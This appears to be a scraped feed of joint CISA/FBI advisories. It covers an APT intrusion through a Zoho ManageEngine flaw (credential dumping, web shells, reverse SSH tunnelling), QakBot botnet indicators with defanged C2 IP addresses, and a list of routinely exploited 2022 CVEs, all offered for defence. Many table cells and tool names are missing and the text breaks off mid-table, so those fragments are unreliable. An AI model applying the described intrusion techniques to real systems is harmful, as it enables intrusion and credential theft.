A remote desktop application that provides platform-independent remote access to personal computers and other devices running the host application. It offers remote control, file transfer, and VPN functionality.
|
Between early-February and mid-March 2023,
Note: Analysts confirmed APT actors’ weaponized use of |
quser.exe |
A valid program on Windows machines that displays information about user sessions on a Remote Desktop Session Host server [T1049], including the name of the user, name of the session on the remote desktop session host server, session ID, state of the session (active or disconnected), idle time (number of minutes since last keystroke or mouse movement), and date/time the user logged on.[8] |
APT actors were observed using this tool as early as March 2023 across four locations with the same name but different hashes (one of which is associated with the Portuguese [Brazil] language pack):
|
xpack.exe |
A custom |
This malware was predominantly used to execute system commands, drop additional malware and tools, and stage data for exfiltration [T1074]. Note: The data exfiltrated is unknown. |
See Tables 3-13 for all referenced APT actors’ tactics and techniques for enterprise environments in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Technique Title |
ID |
Use |
---|---|---|
Acquire Infrastructure: Botnet |
Actors used User-Agent string |
|
Develop Capabilities: Malware |
Actors created and used a variant of Metasploit (Meterpreter) on the ServiceDesk system, listed as |
|
Obtain Capabilities: Exploits |
Actors leveraged the legitimate ConnectWise ScreenConnect client to download and utilize the credential dumping tool, |
Technique Title |
ID |
Use |
---|---|---|
Exploit Public-Facing Application |
Actors exploited a known vulnerability (CVE-2022-47966) in the organization’s web server hosting Zoho ManageEngine ServiceDesk Plus. Actors also attempted to exploit a known Apache Log4j vulnerability (CVE-2021-44228) in the ServiceDesk system but were unsuccessful. |
Technique Title |
ID |
Use |
Command and Scripting Interpreter: PowerShell |
Actors installed and used Metasploit via PowerShell on the organization’s domain controller. |
|
Command and Scripting Interpreter: JavaScript |
Actors dropped an ASPX web shell on the OWA server, which was designed to execute remote JavaScript code. |
Technique Title |
ID |
Use |
Scheduled Task/Job: Scheduled Task |
Actors created the scheduled task |
|
Valid Accounts: Local Accounts |
Actors compromised and utilized account credentials from a previously hired contractor, of which the contract ended prior to the timeframe of observed activity. |
|
External Remote Services |
|
|
Create Account: Local Account |
Actors created a local account with administrative permissions on the server hosting ServiceDesk Plus. |
|
Server Software Component: Web Shell |
Actors logged into the OWA server from the ServiceDesk system and dropped an ASPX web shell to establish persistent access and execute remote code. |
|
Create or Modify System Process: Windows Service |
Actors created a Windows Service via Metasploit. |
Technique Title |
ID |
Use |
---|---|---|
Exploitation for Privilege Escalation |
Through exploitation of CVE-2022-47966, actors were given root level access on the web server and created a local user account named |
Technique Title |
ID |
Use |
Indicator Removal: Clear Windows Event Logs |
Actors compromised and used disabled, legitimate administrative account credentials to delete logs from several critical servers in the environment. |
|
Masquerading: Masquerade Task or Service |
Actors created a scheduled task |
|
Masquerading: Masquerade File Type |
Actors attempted to export three files, which were analyzed and identified as LSASS dump files. These files were renamed with |
|
Obfuscated Files or Information: Embedded Payloads |
Actors downloaded the malware |
|
Subvert Trust Controls: Code Signing |
|
|
Hide Artifacts: Hidden Files and Directories |
Actors used |
|
Hide Artifacts: Hidden Window |
Actors used |
Technique Title |
ID |
Use |
---|---|---|
OS Credential Dumping |
Actors created three files as means for Mimikatz to dump/write credentials to disk on the ServiceDesk system. |
|
OS Credential Dumping: LSASS Memory |
Actors successfully accessed and dumped credentials stored in the process memory of LSASS for the AD domain, including with the use of ProcDump. |
|
OS Credential Dumping: Security Account Manager |
Actors dumped |
Technique Title |
ID |
Use |
System Network Connections Discovery |
|
|
Query Registry |
Actors dumped |
|
Remote System Discovery |
Actors downloaded the legitimate file/application |
|
Network Sniffing |
Actors downloaded the legitimate file/application |
|
Network Service Discovery |
Actors executed DNS scanning at a web server and directed callback to the |
|
Process Discovery |
ProcDump was created within the |
Technique Title |
ID |
Use |
---|---|---|
Remote Services: Remote Desktop Protocol |
Ngrok was used to establish an RDP connection with the ServiceDesk system. |
|
Lateral Tool Transfer |
Actors compromised one host and moved laterally to install |
Technique Title |
ID |
Use |
---|---|---|
Data Staged |
Actors executed |
Technique Title |
ID |
Use |
Application Layer Protocol: Web Protocols |
|
|
Remote Access Software |
Actors leveraged ConnectWise ScreenConnect to connect to the ServiceDesk system.
|
|
Non-Standard Port |
Actors initiated multiple TLS-encrypted sessions on non-standard TCP port |
|
Protocol Tunneling |
Actors were observed leveraging SSH to build a reverse tunnel with their C2 server to dynamically forward traffic into the victim organization’s environment. Using Ngrok as an external service, actors were also able to gain access to and use the command line on victim systems via RDP. |
|
Encrypted Channel: Asymmetric Cryptography |
Actors initiated multiple TLS-encrypted sessions on TCP port |
CISA and co-sealers recommend reviewing Tables 3-13: Identified ATT&CK Techniques for Enterprise in conjunction with the detections in this section to identify similar activity.
net user /add
, useradd
, and dscl -create
[DS0017].CreateServiceW()
) to repeatedly execute malicious payloads as part of persistence [DS0009].Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
CISA and co-sealers identified that exploitation of CVE-2022-47966 granted initial access to the public-facing application, Zoho ManageEngine ServiceDesk Plus. Multiple Zoho ManageEngine on-premises products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of version 1.4.1 of Apache XML Security for Java (also known as xmlsec) from the Apache Santuario project. Due to the xmlsec XSLT features by design in that version, the application is responsible for certain security protections. CISA and co-sealers recommend the following:
CISA and co-sealers identified that the organization did not employ proper network segmentation, such as a demilitarized zone (DMZ), during the initial discovery phase of the incident response. A DMZ serves as a perimeter network that protects and adds an extra layer of security to an organization’s internal local area network (LAN) from untrusted traffic.
APT actors were able to leverage disabled administrative accounts, as well as clear logs on several critical servers, which prevented the ability to detect follow-on exploitation or data exfiltration. CISA and co-sealers recommend the following:
Remote access software provides a proactive and flexible approach for organizations to internally oversee networks, computers, and other devices; however, cyber threat actors increasingly co-opt these tools for access to victim systems. APT actors were observed using legitimate remote access tools—ConnectWise ScreenConnect and AnyDesk—to connect to victim hosts within the organization’s environment and further conduct malicious operations. CISA and co-sealers recommend the following:
For more information, see CISA’s joint Guide to Securing Remote Access Software on best practices for using remote capabilities and how to detect and defend against malicious actors abusing this software.
PROGRAMFILES
, PROGRAMFILES(X86)
, and SYSTEM32
. Disallow all other locations unless an exception is granted and documented. Application directory allowlisting can be enabled through Microsoft Software Restriction Policy or AppLocker and can prevent the execution of unauthorized software.In addition to applying mitigations, CISA and co-sealers recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and co-sealers also recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA and co-sealers recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
The information in this report is being provided “as is” for informational purposes only. CISA, the FBI, and CNMF do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA, the FBI, or CNMF.
September 7, 2023: Initial version.
]]>The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory (CSA) to disseminate QakBot infrastructure indicators of compromise (IOCs) identified through FBI investigations as of August 2023. On August 25, FBI and international partners executed a coordinated operation to disrupt QakBot infrastructure worldwide. Disruption operations targeting QakBot infrastructure resulted in the botnet takeover, which severed the connection between victim computers and QakBot command and control (C2) servers. The FBI is working closely with industry partners to share information about the malware to maximize detection, remediation, and prevention measures for network defenders.
CISA and FBI encourage organizations to implement the recommendations in the Mitigations section to reduce the likelihood of QakBot-related activity and promote identification of QakBot-facilitated ransomware and malware infections. Note: The disruption of QakBot infrastructure does not mitigate other previously installed malware or ransomware on victim computers. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to a local FBI Field Office or CISA at cisa.gov/report.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
QakBot—also known as Qbot, Quackbot, Pinkslipbot, and TA570—is responsible for thousands of malware infections globally. QakBot has been the precursor to a significant amount of computer intrusions, to include ransomware and the compromise of user accounts within the Financial Sector. In existence since at least 2008, QakBot feeds into the global cybercriminal supply chain and has deep-rooted connections to the criminal ecosystem. QakBot was originally used as a banking trojan to steal banking credentials for account compromise; in most cases, it was delivered via phishing campaigns containing malicious attachments or links to download the malware, which would reside in memory once on the victim network.
Since its initial inception as a banking trojan, QakBot has evolved into a multi-purpose botnet and malware variant that provides threat actors with a wide range of capabilities, to include performing reconnaissance, engaging in lateral movement, gathering and exfiltrating data, and delivering other malicious payloads, including ransomware, on affected devices. QakBot has maintained persistence in the digital environment because of its modular nature. Access to QakBot-affected (victim) devices via compromised credentials are often sold to further the goals of the threat actor who delivered QakBot.
QakBot and affiliated variants have targeted the United States and other global infrastructures, including the Financial Services, Emergency Services, and Commercial Facilities Sectors, and the Election Infrastructure Subsector. FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood of QakBot-related infections and promote identification of QakBot-induced ransomware and malware infections. Disruption of the QakBot botnet does not mitigate other previously installed malware or ransomware on victim computers. If a potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to CISA and FBI.
QakBot’s modular structure allows for various malicious features, including process and web injection, victim network enumeration and credential stealing, and the delivery of follow-on payloads such as Cobalt Strike[1], Brute Ratel, and other malware. QakBot infections are particularly known to precede the deployment of human-operated ransomware, including Conti[2], ProLock[3], Egregor[4], REvil[5], MegaCortex[6], Black Basta[7], Royal[8], and PwndLocker.
Historically, QakBot’s C2 infrastructure relied heavily on using hosting providers for its own infrastructure and malicious activity. These providers lease servers to malicious threat actors, ignore abuse complaints, and do not cooperate with law enforcement. At any given time, thousands of victim computers running Microsoft Windows were infected with QakBot—the botnet was controlled through three tiers of C2 servers.
The first tier of C2 servers includes a subset of thousands of bots selected by QakBot administrators, which are promoted to Tier 1 “supernodes” by downloading an additional software module. These supernodes communicate with the victim computers to relay commands and communications between the upstream C2 servers and the infected computers. As of mid-June 2023, 853 supernodes have been identified in 63 countries, which were active that same month. Supernodes have been observed frequently changing, which assists QakBot in evading detection by network defenders. Each bot has been observed communicating with a set of Tier 1 supernodes to relay communications to the Tier 2 C2 servers, serving as proxies to conceal the main C2 server. The Tier 3 server controls all of the bots.
FBI has observed the following threat actor tactics, techniques, and procedures (TTPs) in association with OakBot infections:
HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun
C:UsersAppDataRoamingMicrosoft
HKEY_CURRENT_USERSoftwareMicrosoft
In addition, the below IP addresses were assessed to have obtained access to victim computers. Organizations are encouraged to review any connections with these IP addresses, which could potentially indicate a QakBot and/or follow-on malware infection.
Disclaimer: The below IP addresses are assessed to be inactive as of August 29, 2023. Several of these observed IP addresses were first observed as early as 2020, although most date from 2022 or 2023, and have been historically linked to QakBot. FBI and CISA recommend these IP addresses be investigated or vetted by organizations prior to taking action, such as blocking.
IP Address |
First Seen |
---|---|
85.14.243[.]111 |
April 2020 |
51.38.62[.]181 |
April 2021 |
51.38.62[.]182 |
December 2021 |
185.4.67[.]6 |
April 2022 |
62.141.42[.]36 |
April 2022 |
87.117.247[.]41 |
May 2022 |
89.163.212[.]111 |
May 2022 |
193.29.187[.]57 |
May 2022 |
193.201.9[.]93 |
June 2022 |
94.198.50[.]147 |
August 2022 |
94.198.50[.]210 |
August 2022 |
188.127.243[.]130 |
September 2022 |
188.127.243[.]133 |
September 2022 |
94.198.51[.]202 |
October 2022 |
188.127.242[.]119 |
November 2022 |
188.127.242[.]178 |
November 2022 |
87.117.247[.]41 |
December 2022 |
190.2.143[.]38 |
December 2022 |
51.161.202[.]232 |
January 2023 |
51.195.49[.]228 |
January 2023 |
188.127.243[.]148 |
January 2023 |
23.236.181[.]102 |
Unknown |
45.84.224[.]23 |
Unknown |
46.151.30[.]109 |
Unknown |
94.103.85[.]86 |
Unknown |
94.198.53[.]17 |
Unknown |
95.211.95[.]14 |
Unknown |
95.211.172[.]6 |
Unknown |
95.211.172[.]7 |
Unknown |
95.211.172[.]86 |
Unknown |
95.211.172[.]108 |
Unknown |
95.211.172[.]109 |
Unknown |
95.211.198[.]177 |
Unknown |
95.211.250[.]97 |
Unknown |
95.211.250[.]98 |
Unknown |
95.211.250[.]117 |
Unknown |
185.81.114[.]188 |
Unknown |
188.127.243[.]145 |
Unknown |
188.127.243[.]147 |
Unknown |
188.127.243[.]193 |
Unknown |
188.241.58[.]140 |
Unknown |
193.29.187[.]41 |
Unknown |
Organizations are also encouraged to review the Qbot/QakBot Malware presentation from the U.S. Department of Health & Human Services Cybersecurity Program for additional information.
For detailed associated software descriptions, tactics used, and groups that have been observed using this software, see MITRE ATT&CK’s page on QakBot.[9]
Note: For situational awareness, the following SHA-256 hash is associated with FBI’s QakBot uninstaller: 7cdee5a583eacf24b1f142413aabb4e556ccf4ef3a4764ad084c1526cc90e117
CISA and FBI recommend network defenders apply the following mitigations to reduce the likelihood of QakBot-related activity and promote identification of QakBot-induced ransomware and malware infections. Disruption of the QakBot botnet does not mitigate other already-installed malware or ransomware on victim computers. Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
In addition to applying mitigations, CISA and FBI recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and FBI also recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA and FBI recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques.
FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with QakBot-affiliated actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. FBI and CISA do not encourage paying ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office or CISA at cisa.gov/report.
The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.
August 30, 2023: Initial version.
]]>The following cybersecurity agencies coauthored this joint Cybersecurity Advisory (CSA):
This advisory provides details on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2022 and the associated Common Weakness Enumeration(s) (CWE). In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems.
The authoring agencies strongly encourage vendors, designers, developers, and end-user organizations to implement the recommendations found within the Mitigations section of this advisory—including the following—to reduce the risk of compromise by malicious cyber actors.
Download the PDF version of this report:
In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems. Proof of concept (PoC) code was publicly available for many of the software vulnerabilities or vulnerability chains, likely facilitating exploitation by a broader range of malicious cyber actors.
Malicious cyber actors generally have the most success exploiting known vulnerabilities within the first two years of public disclosure—the value of such vulnerabilities gradually decreases as software is patched or upgraded. Timely patching reduces the effectiveness of known, exploitable vulnerabilities, possibly decreasing the pace of malicious cyber actor operations and forcing pursuit of more costly and time-consuming methods (such as developing zero-day exploits or conducting software supply chain operations).
Malicious cyber actors likely prioritize developing exploits for severe and globally prevalent CVEs. While sophisticated actors also develop tools to exploit other vulnerabilities, developing exploits for critical, wide-spread, and publicly known vulnerabilities gives actors low-cost, high-impact tools they can use for several years. Additionally, cyber actors likely give higher priority to vulnerabilities that are more prevalent in their specific targets’ networks. Multiple CVE or CVE chains require the actor to send a malicious web request to the vulnerable device, which often includes unique signatures that can be detected through deep packet inspection.
Table 1 shows the top 12 vulnerabilities the co-authors observed malicious cyber actors routinely exploiting in 2022:
CVE |
Vendor |
Product |
Type |
CWE |
Fortinet |
FortiOS and FortiProxy |
SSL VPN credential exposure |
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') |
|
(Proxy Shell) |
Microsoft |
Exchange Server |
RCE |
|
(Proxy Shell) |
Microsoft |
Exchange Server |
Security Feature Bypass |
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') |
(Proxy Shell) |
Microsoft |
Exchange Server |
Elevation of Privilege |
|
Zoho ManageEngine |
ADSelfService Plus |
RCE/ Authentication Bypass |
||
Atlassian |
Confluence Server and Data Center |
Arbitrary code execution |
||
(Log4Shell) |
Apache |
Log4j2 |
RCE |
CWE-20 Improper Input Validation
CWE-400 Uncontrolled Resource Consumption
|
VMware |
Workspace ONE Access and Identity Manager |
RCE |
CWE-94 Improper Control of Generation of Code ('Code Injection') |
|
VMware |
Workspace ONE Access, Identity Manager, and vRealize Automation |
Improper Privilege Management |
||
F5 Networks |
BIG-IP |
Missing Authentication Vulnerability |
||
Microsoft |
Multiple Products |
RCE |
None Listed |
|
Atlassian |
Confluence Server and Data Center |
RCE |
In addition to the 12 vulnerabilities listed in Table 1, the authoring agencies identified vulnerabilities—listed in Table 2—that were also routinely exploited by malicious cyber actors in 2022.
CVE |
Vendor |
Product |
Type |
CWE |
Microsoft |
Multiple Products |
Arbitrary Code Execution |
None Listed |
|
Microsoft |
Exchange Server |
Arbitrary Code Execution |
CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer |
|
Ivanti |
Pulse Secure Pulse Connect Secure |
Arbitrary File Reading |
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') |
|
Microsoft |
Remote Desktop Services |
RCE |
||
Citrix |
Application Delivery Controller and Gateway |
Arbitrary Code Execution |
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') |
|
F5 Networks |
BIG-IP |
RCE |
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') |
|
Microsoft |
Multiple Products |
Privilege Escalation |
||
Oracle |
WebLogic Server |
RCE |
None Listed |
|
Oracle |
WebLogic Server |
RCE |
None Listed |
|
SonicWALL |
SSLVPN SMA100 |
SQL Injection |
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') |
|
(ProxyLogon) |
Microsoft |
Exchange Server |
RCE |
|
(ProxyLogon) |
Microsoft |
Exchange Server |
RCE |
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') |
(ProxyLogon) |
Microsoft |
Exchange Server |
RCE |
None Listed |
(ProxyLogon) |
Microsoft |
Exchange Server |
RCE |
|
SonicWALL |
Email Security |
Privilege Escalation Exploit Chain |
||
Apache |
HTTP Server |
Server-Side Request Forgery |
||
Apache |
HTTP Server |
Server Path Traversal |
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') |
|
Apache |
HTTP Server |
Server Path Traversal |
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') |
|
SonicWall |
SMA 100 Series Appliances |
Stack-based Buffer Overflow |
||
Apache |
Log4j |
RCE |
||
Fortinet |
FortiOS |
Heap-based Buffer Overflow |
||
Zimbra |
Collaboration Suite |
‘Cross-site Scripting’ |
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') |
|
SAP |
Internet Communication Manager (ICM) |
HTTP Request Smuggling |
CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') |
|
VMware Tanzu |
Spring Cloud |
RCE |
CWE-94: Improper Control of Generation of Code ('Code Injection') |
|
WSO2 |
Multiple Products |
RCE |
||
Zimbra |
Zimbra Collaboration Suite |
Command Injection |
||
Microsoft |
Windows CSRSS |
Elevation of Privilege |
||
QNAP |
QNAP NAS |
Externally Controlled Reference |
CWE-610: Externally Controlled Reference to a Resource in Another Sphere |
|
Microsoft |
Exchange Server |
Privilege Escalation |
None Listed |
|
Fortinet |
FortiOS, FortiProxy, FortiSwitchManager |
Authentication Bypass |
The authoring agencies recommend vendors and developers take the following steps to ensure their products are secure by design and default:
For more information on designing secure-by-design and -default products, including additional recommended secure-by-default configurations, see joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Security-by-Design and -Default.
The authoring agencies recommend end-user organizations implement the mitigations below to improve cybersecurity posture on the basis of the threat actors’ activity. These mitigations align with the cross-sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on CPGs, including additional recommended baseline protections.
The information in this report is being provided “as is” for informational purposes only. CISA, FBI, NSA, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.
This document was developed by CISA, NSA, FBI, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.
[1] Apache Log4j Vulnerability Guidance
August 3, 2023: Initial version.
CVE |
Vendor |
Affected Products and Versions |
Patch Information |
Resources |
Microsoft |
Multiple Products |
Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows |
||
Microsoft |
Office, Multiple Versions |
Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882 |
||
Fortinet |
FortiOS and FortiProxy 2.0.2, 2.0.1, 2.0.0, 1.2.8, 1.2.7, 1.2.6, 1.2.5, 1.2.4, 1.2.3, 1.2.2, 1.2.1, 1.2.0, 1.1.6 |
FortiProxy - system file leak through SSL VPN special crafted HTTP resource requests |
Joint CSAs: |
|
Ivanti |
Pulse Secure Pulse Connect Secure versions, 9.0R1 to 9.0R3.3, 8.3R1 to 8.3R7, and 8.2R1 to 8.2R12 |
CISA Alerts: Continued Exploitation of Pulse Secure VPN Vulnerability Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity ACSC Advisory: 2019-129: Recommendations to mitigate vulnerability in Pulse Connect Secure VPN Software Joint CSA: CCCS Alert: |
||
Microsoft |
Remote Desktop Services |
|||
Citrix |
ADC and Gateway version 13.0 all supported builds before 13.0.47.24 NetScaler ADC and NetScaler Gateway, version 12.1 all supported builds before 12.1.55.18; version 12.0 all supported builds before 12.0.63.13; version 11.1 all supported builds before 11.1.63.15; version 10.5 all supported builds before 10.5.70.12 SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b |
Joint CSAs: Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity CCCS Alert: |
||
F5 |
BIG IP versions 15.1.0, 15.0.0 to 15.0.1, 14.1.0 to 14.1.2, 13.1.0 to 13.1.3, 12.1.0 to 12.1.5, and 11.6.1 to 11.6.5 |
CISA Alert: |
||
Microsoft |
Windows Server, Multiple Versions |
Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472 |
ACSC Advisory: 2020-016: Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472) Joint CSA: CCCS Alert: Microsoft Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472 - Update 1 |
|
Oracle |
WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 |
|
||
Oracle |
WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 |
|||
SonicWALL |
SSLVPN SMA100, Build Version 10.x |
Confirmed Zero-day vulnerability in the SonicWall SMA100 build version 10.x |
||
Microsoft |
Exchange Server, Multiple Versions |
Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855 |
CISA Alert: |
|
CVE-2021-26857 | Microsoft | Exchange Server, Multiple Versions | Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26857 | |
Microsoft |
Exchange Server, Multiple Versions |
Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26858 |
CISA Alert: |
|
Microsoft |
Multiple Products |
Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-27065 |
CISA Alert: |
|
SonicWALL |
Email Security version 10.0.9.x Email Security |
SonicWall Email Security pre-authentication administrative account creation vulnerability |
||
Microsoft |
Exchange Server, Multiple Versions |
Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31207 |
CISA Alert: Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities ACSC Alert: |
|
Atlassian |
Confluence Server and Data Center, versions: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1 |
CISA Alert: CISA Adds One Known Exploited Vulnerability (CVE-2022-26134) to Catalog ACSC Alert: Remote code execution vulnerability present in Atlassian Confluence Server and Data Center |
||
Microsoft |
Exchange Server, Multiple Version |
Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473 |
Joint CSA: |
|
Microsoft |
Microsoft Exchange Server 2013 Cumulative Update 23 Microsoft Exchange Server 2016 Cumulative Updates 19 and 20 Microsoft Exchange Server 2019 Cumulative Updates 8 and 9 |
Microsoft Exchange Server Elevation of Privilege Vulnerability, CVE-2021-34523 |
CISA Alert: Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities |
|
Jira Atlassian |
Confluence Server and Data Center, versions 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. |
Jira Atlassian: Confluence Server Webwork OGNL injection - CVE-2021-26084 |
CISA Alert: Atlassian Releases Security Updates for Confluence Server and Data Center |
|
Zoho ManageEngineCorp. |
ManageEngine ADSelfService Plus builds up to 6113 |
Security advisory - ADSelfService Plus authentication bypass vulnerability |
ACSC Alert: Critical vulnerability in ManageEngine ADSelfService Plus exploited by cyber actors |
|
Apache |
HTTP Server 2.4.48 |
|||
Apache |
Apache HTTP Server 2.4.49 |
|||
Apache |
Apache HTTP Server 2.4.50 |
|||
SonicWall |
SMA 100 Series (SMA 200, 210, 400, 410, 500v), versions 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24svSMA 100 series appliances |
ACSC Alert: CCCS Alert: |
||
Apache |
Log4j, all versions from 2.0-beta9 to 2.14.1 For other affected vendors and products, see CISA's GitHub repository. |
Apache Log4j Security Vulnerabilities
For additional information, see joint CSA: Mitigating Log4Shell and Other Log4j-Related Vulnerabilities |
CISA webpage: Apache Log4j Vulnerability Guidance CCCS Alert: Active exploitation of Apache Log4j vulnerability - Update 7 ACSC Advisory: 2021-007: Log4j vulnerability – advice and mitigations ACSC Publication: |
|
Apache |
Log4j 2.15.0Log4j |
|||
Fortinet |
FortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and
FortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier |
|||
Zimbra |
Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 (update 1) Collaboration Suite |
|||
SAP |
NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53, and SAP Web Dispatcher Internet Communication Manager (ICM) |
CISA Alert: Critical Vulnerabilities Affecting SAP Applications Employing Internet Communication Manager (ICM) |
||
VMware Tanzumware Tanzu |
Spring Cloud Function versions 3.1.6, 3.2.2, and older unsupported versions |
CVE-2022-22963: Remote code execution in Spring Cloud Function by malicious Spring Expression |
||
VMware |
Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0
Identity Manager (vIDM) 3.3.6, 3.3.5, 3.3.4, 3.3.3 vRealize Automation (vIDM), 8.x, 7.6 VMware Cloud Foundation (vIDM), 4.x
vRealize Suite Lifecycle Manager (vIDM), 8.xWorkspace
ONE Access and Identity Manager |
|||
VMware |
Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0 Identity Manager (vIDM) and vRealize Automation3.3.6, 3.3.5, 3.3.4, 3.3.3
vRealize Automation (vIDM), 8.x, 7.6
VMware Cloud Foundation (vIDM), 4.x
VMware Cloud Foundation (vRA), 3.x
vRealize Suite Lifecycle Manager (vIDM), 8.x |
|||
AtlassianWSO2 |
WSO2 API Manager 2.2.0 and above through 4.0.0
WSO2 Identity Server 5.2.0 and above through 5.11.0
WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0
WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0
WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0 |
|||
Zimbra |
Zimbra Collaboration Suite, 8.8.15 and 9.0 |
|||
F5 Networks |
F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and All 12.1.x and 11.6.x versions |
Joint CSA: |
||
Microsoft |
